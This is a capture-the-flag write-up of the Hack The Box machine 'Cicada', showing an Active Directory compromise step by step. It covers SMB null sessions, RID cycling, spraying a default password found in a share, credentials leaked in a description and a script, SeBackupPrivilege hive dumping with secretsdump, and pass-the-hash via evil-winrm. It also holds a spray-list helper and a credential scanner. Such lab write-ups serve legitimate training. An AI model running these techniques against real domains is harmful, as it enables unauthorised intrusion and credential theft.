Cicada is an easy-difficulty Windows machine designed to be straightforward, with no rabbit holes. Let’s dive in and explore how to hack this box!
As a beginner in hacking, the most important step is reconnaissance, and Nmap is an essential tool for this process. Before diving in, map the target machine's IP address to its hostname by adding an entry to the /etc/hosts file. Several of the services on this box (Kerberos, LDAP, WinRM with Kerberos auth) expect to be addressed by name, so getting name resolution right up front saves trouble later.
To do this, open the /etc/hosts file using the following command:
sudo nano /etc/hosts
Add the target machine’s IP address and map it to the hostname cicada.htb as shown below:
<Target_IP> cicada.htb
Replace <Target_IP> with the actual IP address of the machine (10.10.11.35 in this write-up).
Nmap Scan Results
To begin reconnaissance, I ran an Nmap scan using the following command:
nmap -sC -sV 10.10.11.35
This command runs the default NSE scripts (-sC) and version detection (-sV) to gather detailed information about the target. Without -p- it only covers the 1000 most common TCP ports, so a follow-up full-port scan is worth running once the obvious services are enumerated. Here are the results:
Nmap Output:
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.061s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-31 13:36:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-31T13:37:15
|_ start_date: N/A
|_clock-skew: 6h43m37s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.36 seconds
Analysis of the Results
The Nmap scan revealed several open ports and services running on the target machine. Here’s a breakdown of the key findings:
1. Domain Controller Identification:
The hostname CICADA-DC.cicada.htb together with DNS, Kerberos, LDAP (including the Global Catalog on 3268/3269) and SMB on a single host means this machine is a Domain Controller for the cicada.htb domain. Because the box is the DC, every credential found later is a domain credential, not just a local one.
2. Open Ports and Services:
Port 53 (DNS): A DNS server, as expected on a Domain Controller.
Port 88 (Kerberos): Authentication in Active Directory. It is also usable for username enumeration, since the KDC answers differently for existing and non-existing principals.
Ports 135, 139, 445 (RPC/SMB): Windows file sharing and remote procedure calls; share listing and RID cycling happen here.
Ports 389, 636, 3268, 3269 (LDAP): Directory services, with 636 and 3269 being LDAP over TLS and 3268/3269 the Global Catalog.
Port 5985 (WinRM): Windows Remote Management over HTTP. With valid credentials for a user in the Remote Management Users group (or an administrator) this gives a remote PowerShell session.
3. Security Observations:
SMB Signing: Enabled and required, so NTLM relay to this host's SMB service is off the table; credentials have to be obtained, not relayed.
Clock skew: The DC's clock is 6h43m37s off from mine. Kerberos rejects requests outside a five-minute window, so any Kerberos-based tooling (TGT requests, Kerberoasting, ticket attacks) needs the local clock synced to the target first, for example with ntpdate or faketime. The SMB-based enumeration below does not need it.
TLS Certificates: The LDAP services present a certificate issued to CICADA-DC.cicada.htb that was still valid at scan time (2024-08-22 to 2025-08-22).
Next Steps
Based on the Nmap results, the following steps are recommended:
1. Enumerate SMB Shares: Check for anonymously accessible shares using tools like smbclient or nxc (the successor of crackmapexec).
2. Inspect LDAP: Use tools like ldapsearch to gather information about the Active Directory environment. Anonymous binds are often disabled, so this may have to wait for credentials.
3. Explore WinRM: Since port 5985 is open, WinRM is the likely path to a shell once credentials turn up.
Enumerating SMB Shares
To gather more information about the target, I used smbclient
to enumerate the SMB shares available on the machine. The following command was executed:
smbclient -L //10.10.11.35 -N
This command lists the shares on the target (-L) over a null session: -N suppresses the password prompt, so no credentials are sent at all. Here are the results:
SMB Share Enumeration Results:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Analysis of SMB Shares
The enumeration revealed several SMB shares, each serving a specific purpose:
1. Default Administrative Shares:
ADMIN$: Used for remote administration (it maps to the Windows directory).
C$: Provides access to the root of the C: drive.
Both require local administrator rights to open.
2. Custom Shares:
DEV: Likely used for development purposes.
HR: Possibly related to human resources data.
3. System Shares:
IPC$: Used for inter-process communication (named pipes such as samr and lsarpc, which user enumeration over RPC relies on).
NETLOGON and SYSVOL: Critical for Active Directory logon and Group Policy distribution. They are readable by every domain user and are a classic place to look for scripts containing credentials.
Next Steps
1. Explore Accessible Shares: Attempt to read the non-default shares (DEV and HR) over the same null session to see if they contain any useful files.
2. Check the Null Session: The share listing already succeeded without credentials, so the server accepts null or guest sessions. The next question is how much enumeration IPC$ permits that way (user listing through RID cycling, the password policy).
3. Gather Credentials: If credentials are obtained, revisit the administrative shares (ADMIN$ and C$), which need a local administrator, and re-check DEV and HR with an authenticated session, since a share that refuses a null session may still be readable by any domain user.
Exploring the HR Share
After enumerating the available SMB shares, I found the HR share to be particularly interesting. To explore its contents, I used the following command:
smbclient //10.10.11.35/HR -N
This command connects to the HR share over a null session (-N). Once connected, I listed the files in the share using the ls command:
Contents of the HR Share:
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 435811 blocks available
Retrieving the File
The share contained a single file named Notice from HR.txt. To download it for further analysis, I used the get command (the name is quoted because of the spaces):
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)
Analyzing the HR Notice
After downloading Notice from HR.txt, I examined its contents using the cat command:
cat Notice\ from\ HR.txt
Contents of Notice from HR.txt:
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Key Findings
1. Default Password: The file contains a default password: Cicada$M6Corpb*@Lp#nZp!8. It is handed to every new hire, so any account whose owner never changed it is still using it, which makes it a strong password-spray candidate.
2. Username Hint: The file does not mention a username, only logging into a "Cicada Corp account". Usernames therefore have to be enumerated rather than guessed; the RID cycling further down shows the domain uses the firstname.lastname convention.
Next Steps
1. Identify Usernames: Use tools like kerbrute, enum4linux or nxc to enumerate valid usernames in the Active Directory environment. Guessing common names (admin, newhire, user) is only a fallback if enumeration fails.
2. Test the Default Password: Spray Cicada$M6Corpb*@Lp#nZp!8 against the enumerated usernames over SMB (port 445), with WinRM (5985) and Kerberos (88) as alternatives. Check the domain lockout policy first: one pass with a single password is safe, repeated passes against a low threshold can lock out every account.
3. Explore WinRM: Since port 5985 (WinRM) is open, use evil-winrm to test any working credentials for a shell.
Enumerating Usernames
To identify valid usernames on the target machine, I used two approaches: Kerberos enumeration with Nmap and SMB RID brute-forcing with nxc.
1. Kerberos Enumeration with Nmap
I started by using Nmap's krb5-enum-users script. It sends AS-REQs without pre-authentication and tells valid principals from unknown ones by the KDC's error code, but it only tries the names in its built-in username list, which is why it finds so few. The following command was executed:
nmap -Pn -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='cicada.htb' 10.10.11.35
Results:
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.046s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@cicada.htb
|_ administrator@cicada.htb
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
Analysis:
Two valid usernames were discovered:
guest
administrator
2. SMB RID Brute-Forcing with nxc
Next, I used nxc to RID-cycle the SMB service. With the empty password the server maps the anonymous user to Guest; from that session the domain SID is looked up and RIDs 500 to 3000 are translated back to names over LSARPC, which enumerates users, groups and computer accounts. The following command was executed:
nxc smb 10.10.11.35 -u 'anonymous' -p '' --rid-brute 3000
Results:
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\anonymous: (Guest)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
The RID brute-force attack revealed several valid usernames:
Administrator
Guest
krbtgt
CICADA-DC$ (machine account)
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Consolidated List of Usernames
Based on the enumeration results, the following usernames were identified:
administrator
guest
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
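The two outputs above were merged by hand into the list just given. As an added example (not part of the original write-up), the following Python parses both the nmap krb5-enum-users block and the nxc --rid-brute lines, keeps only real user accounts (SidTypeUser, RID 1000 or higher, no trailing $ that marks a machine account), re-adds the principals Kerberos confirmed, and produces the same consolidated list. The sample text is constructed from the outputs quoted above, with one SidTypeGroup line (Domain Users, RID 513) added to show that groups are filtered out.

```python
import re

# Constructed sample: the krb5-enum-users block from the Nmap run quoted above.
NMAP_KRB5_OUTPUT = """\
| krb5-enum-users:
| Discovered Kerberos principals
| guest@cicada.htb
|_ administrator@cicada.htb
"""

# Constructed sample: the nxc --rid-brute lines quoted above, plus one group line
# (Domain Users, RID 513) added here to show that non-user SIDs are dropped.
NXC_RID_BRUTE_OUTPUT = r"""
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\anonymous: (Guest)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
"""

# "| guest@cicada.htb" or "|_ administrator@cicada.htb" -> principal name
KRB_RE = re.compile(r"^\|_?\s*([^@\s]+)@([\w.-]+)\s*$")
# "... 1104: CICADA\john.smoulder (SidTypeUser)" -> rid, domain, name, sid type
RID_RE = re.compile(r"\s(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)\s*$")


def parse_krb5_enum_users(text):
    """Return the lower-cased principal names the krb5-enum-users script confirmed."""
    users = set()
    for line in text.splitlines():
        m = KRB_RE.match(line)
        if m:
            users.add(m.group(1).lower())
    return users


def parse_rid_brute(text, min_rid=1000):
    """Return {username: rid} for real user accounts from nxc --rid-brute output.
    Groups (SidTypeGroup), machine accounts (trailing $) and well-known RIDs
    below min_rid (Administrator, Guest, krbtgt) are skipped by default."""
    users = {}
    for line in text.splitlines():
        m = RID_RE.search(line)
        if not m:
            continue
        rid, name, sidtype = int(m.group(1)), m.group(3), m.group(4)
        if sidtype != "SidTypeUser" or name.endswith("$") or rid < min_rid:
            continue
        users[name.lower()] = rid
    return users


def build_spray_list(krb_text, rid_text):
    """Union of both sources, lower-cased and de-duplicated, ready for a spray."""
    names = parse_krb5_enum_users(krb_text) | set(parse_rid_brute(rid_text))
    return sorted(names)


if __name__ == "__main__":
    print("\n".join(build_spray_list(NMAP_KRB5_OUTPUT, NXC_RID_BRUTE_OUTPUT)))
```

Write the result to a file and hand it to nxc with -u users.txt -p '<password>' --continue-on-success; run --pass-pol once beforehand so you know the lockout threshold before a single spray goes out.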
Enumerating User Information with enum4linux
enum4linux is a handy wrapper around the SMB and RPC enumeration tools, but it has no password-spraying feature. So I tested the default password Cicada$M6Corpb*@Lp#nZp!8 against each enumerated username by hand (nxc can do the same in one run against a user list). The account michael.wrightson was still using the default password. To gather more information with those credentials, I ran the following enum4linux command:
enum4linux -A -a -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35
Key Findings from enum4linux:
1. Valid Credentials:
The server accepts sessions as michael.wrightson with the password Cicada$M6Corpb*@Lp#nZp!8.
2.Domain Information:
Domain Name: CICADA
Domain SID: S-1-5-21-917908876-1423158569-3159038727
3.OS Information:
The target is a Windows Server acting as a Primary Domain Controller (PDC).
OS Version: Windows Server 2022 (based on the platform ID and server type).
4. User Accounts:
The enumeration revealed the same user accounts seen during RID cycling:
Administrator
Guest
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
5.Interesting Note:
The account david.orelious
has a description that reads:
Just in case I forget my password is aRt$Lp#7t*VQ!3
Next Steps
1. Test the Password for david.orelious: Use the password aRt$Lp#7t*VQ!3 to authenticate as david.orelious over SMB, WinRM and Kerberos. A password kept in an account's description attribute is readable by every authenticated domain user, which is exactly how it surfaced here.
2. Explore Access for michael.wrightson: Since michael.wrightson uses the default password, explore what access this account has (file shares, group memberships).
3. Check for Privilege Escalation Opportunities: If david.orelious or michael.wrightson has elevated privileges or extra share access, use their credentials to move further.
Accessing the DEV Share as david.orelious
After successfully obtaining the password aRt$Lp#7t*VQ!3
for the account david.orelious
, I decided to explore the SMB shares on the target machine. While the HR
share was accessible anonymously, I used the credentials for david.orelious to access the DEV
share. The following command was executed:
smbclient //10.10.11.35/DEV -U david.orelious
Contents of the DEV Share:
smb: \> ls
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 433661 blocks available
Retrieving the Backup Script
The DEV share contained a PowerShell script named Backup_script.ps1. I downloaded it using the get command:
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
Analyzing the Backup Script
The contents of Backup_script.ps1
were as follows:
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Key Findings
1. Hardcoded Credentials: The script contains hardcoded credentials for the user emily.oscars:
Username: emily.oscars
Password: Q!3@Lp#M6b*7t*Vt
2. Backup Process: The script is designed to create a backup of the C:\smb directory and save it to D:\Backup as a .zip file. The $credentials object it builds is never passed to Compress-Archive or anything else, so the secret sits in the file for no reason at all.
Observations
1. Security Misconfiguration: Hardcoding credentials in scripts is a significant security risk, since the secret is exposed to anyone who can read the script, and here the DEV share was readable by an ordinary domain user. The password Q!3@Lp#M6b*7t*Vt may also be reused elsewhere.
2. Potential Privilege Escalation: Backup scripts usually run under an account that has been given backup rights. If emily.oscars holds such privileges, these credentials are a path to escalate on the target.
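Hardcoded credentials of this shape are easy to catch before a script ever lands on a share. The following Python is an added example, not part of the write-up or of the Cicada box: a small scanner that flags the three PowerShell idioms that embed a secret in plain text (ConvertTo-SecureString ... -AsPlainText, a PSCredential built from two string literals, and a $password = "..." style assignment), attaches the nearest $username literal so the finding is actionable, and returns nothing for a variant of the same backup script that loads a DPAPI-protected credential with Import-Clixml instead. All three script texts are constructed here: the first reproduces the relevant lines of Backup_script.ps1, the second is a hypothetical hardened version, and the third exercises the other two patterns with a made-up svc_backup account.

```python
import re

# Constructed sample: the credential-handling lines of the recovered Backup_script.ps1.
LEAKY_SCRIPT = r'''
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
Compress-Archive -Path "C:\smb" -DestinationPath "D:\Backup\smb_backup.zip"
'''

# Hypothetical hardened version: the PSCredential was exported once with Export-Clixml
# (DPAPI-encrypted for the account running the task) and is imported at run time.
SAFE_SCRIPT = r'''
$credentials = Import-Clixml -Path "C:\ProgramData\backup\cred.xml"
Compress-Archive -Path "C:\smb" -DestinationPath "D:\Backup\smb_backup.zip"
'''

# Constructed sample to exercise the remaining patterns; svc_backup/hunter2 are invented.
OTHER_SNIPPET = r'''
$pwd = 'hunter2'
$cred = New-Object System.Management.Automation.PSCredential("svc_backup", (ConvertTo-SecureString "hunter2" -AsPlainText -Force))
'''

PATTERNS = {
    "plaintext SecureString": re.compile(
        r'ConvertTo-SecureString\s+(?:-String\s+)?(["\'])(?P<secret>.*?)\1[^\n]*-AsPlainText', re.I),
    "PSCredential with literals": re.compile(
        r'PSCredential\s*\(\s*(["\'])(?P<user>[^"\']+)\1\s*,\s*(["\'])(?P<secret>[^"\']+)\3', re.I),
    "password variable literal": re.compile(
        r'\$(?:pass|password|pwd|secret)\w*\s*=\s*(["\'])(?P<secret>[^"\']+)\1', re.I),
}
# Simple string assignments such as $username = "bob", used to name the account a secret belongs to.
VAR_ASSIGN = re.compile(r'\$(?P<name>\w+)\s*=\s*(["\'])(?P<value>[^"\']*)\2')


def literal_variables(script):
    """Map variable name (lower-cased) -> string literal for plain assignments."""
    return {m.group("name").lower(): m.group("value") for m in VAR_ASSIGN.finditer(script)}


def scan_powershell(script):
    """Return a list of findings: line number, rule, associated user (if known), secret."""
    findings = []
    variables = literal_variables(script)
    fallback_user = next((variables[k] for k in ("username", "user", "account") if k in variables), None)
    for lineno, line in enumerate(script.splitlines(), 1):
        for rule, pattern in PATTERNS.items():
            m = pattern.search(line)
            if not m:
                continue
            user = m.groupdict().get("user") or fallback_user
            findings.append({"line": lineno, "rule": rule, "user": user, "secret": m.group("secret")})
    return findings


if __name__ == "__main__":
    for name, text in (("Backup_script.ps1", LEAKY_SCRIPT), ("hardened", SAFE_SCRIPT), ("other", OTHER_SNIPPET)):
        for f in scan_powershell(text):
            print(f"{name}:{f['line']}: {f['rule']} user={f['user']} secret={f['secret']}")
```

The check is deliberately line-based so it can run as a pre-commit hook or over a share listing; it will not follow a secret through string concatenation or a Base64 decode, which is the usual next trick, so treat a clean result as "nothing obvious" rather than "nothing".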
Next Steps
1. Test the Credentials for emily.oscars: Use emily.oscars:Q!3@Lp#M6b*7t*Vt to authenticate over SMB, WinRM and Kerberos.
2. Explore Access for emily.oscars: If the credentials are valid, enumerate the privileges and group memberships of the account.
3. Investigate Backup Directories: Check C:\smb and D:\Backup for sensitive files or earlier backups that could aid further exploitation.
Gaining Access via WinRM
Using the credentials emily.oscars:Q!3@Lp#M6b*7t*Vt obtained from Backup_script.ps1, I authenticated over WinRM (Windows Remote Management) with evil-winrm. The following command was executed:
evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Successful Access:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
You can find the user flag by yourself okay?
Privilege Escalation
To assess the privileges of emily.oscars on the target, I ran whoami /priv, which lists the token privileges the account holds and whether each is enabled. In this case, the following privileges were identified:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Analysis of Privileges
1. SeBackupPrivilege:
Allows the user to read any file or registry key regardless of its ACL, as long as the program opens it with backup semantics (reg save and robocopy /b do; a plain copy does not).
On a Domain Controller this covers the SAM and SYSTEM hives and, via a shadow copy, NTDS.dit, which holds every domain password hash.
2. SeRestorePrivilege:
Allows the user to write to any file or registry key regardless of its ACL.
This can be abused to overwrite a service binary or change a service's ImagePath so that something of your choosing runs as SYSTEM.
3. Other Privileges:
SeShutdownPrivilege, SeChangeNotifyPrivilege and SeIncreaseWorkingSetPrivilege are enabled but of no use for privilege escalation here (SeChangeNotifyPrivilege is granted to every user).
Leveraging SeBackupPrivilege and SeRestorePrivilege
With SeBackupPrivilege and SeRestorePrivilege enabled, I decided to escalate by extracting the SAM and SYSTEM registry hives. SAM holds the NT hashes of the local accounts and SYSTEM holds the boot key needed to decrypt them. One caveat: on a Domain Controller the SAM contains only the local accounts (the DSRM administrator), while domain accounts live in NTDS.dit. The hash recovered below nonetheless logs in as the domain Administrator over WinRM, which only works because the DSRM password and the domain Administrator password are the same on this box; on a real DC you would go after NTDS.dit as well.
Step 1: Copy the SAM and SYSTEM Registry Hives
Using the reg save command, which opens the hives with backup semantics and therefore succeeds with SeBackupPrivilege, I saved the SAM and SYSTEM hives to a writable directory (C:\Temp, created beforehand):
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
Step 2: Download the Hives to the Attacker Machine
Using evil-winrm
, I downloaded the SAM and SYSTEM files to my local machine for further analysis:
download C:\Temp\SAM
download C:\Temp\SYSTEM
Step 3: Extract NTLM Hashes Using secretsdump.py
To extract NTLM hashes, we use the secretsdump.py script from the Impacket toolkit. Before running it, we set up a virtual environment and install Impacket into it (a fresh venv is empty, so the script does not exist until this step):
python3 -m venv ~/impacket-venv
source ~/impacket-venv/bin/activate
pip install impacket
Then we run secretsdump.py in LOCAL mode, which takes the two hive files instead of a target and uses the boot key from SYSTEM to decrypt the hashes stored in SAM:
python ~/impacket-venv/bin/secretsdump.py -sam /home/kali/SAM -system /home/kali/SYSTEM LOCAL
Step 4: Extracted NTLM Hashes
The script outputs NTLM hashes, including the Administrator hash:
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Key Findings
1. Administrator NTLM Hash: The NT hash for the Administrator account was successfully extracted: 2b87e7c93a3e8a0ea4a581937016f341. The first hash field, aad3b435b51404eeaad3b435b51404ee, is the empty LM hash and only means that no LM hash is stored.
2. Other Accounts: Guest and DefaultAccount both carry 31d6cfe0d16ae931b73c59d7e0c089c0, which is the NT hash of an empty password. Neither is of any use for escalation.
Gaining Administrator Access
With the Administrator NTLM hash, I used evil-winrm
to authenticate as the Administrator
account and gain high-privilege access to the target machine.
Command Executed:
evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Successful Access:
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
This write-up documents my journey through the Cicada machine on Hack The Box, from initial reconnaissance to privilege escalation. I hope this detailed explanation provides valuable insights into the techniques and tools used during the process. If you found this guide helpful, I encourage you to share it with friends and fellow enthusiasts who might benefit from it.
Your feedback is greatly appreciated! If you have any questions, suggestions, or additional tips, feel free to reach out. Happy hacking!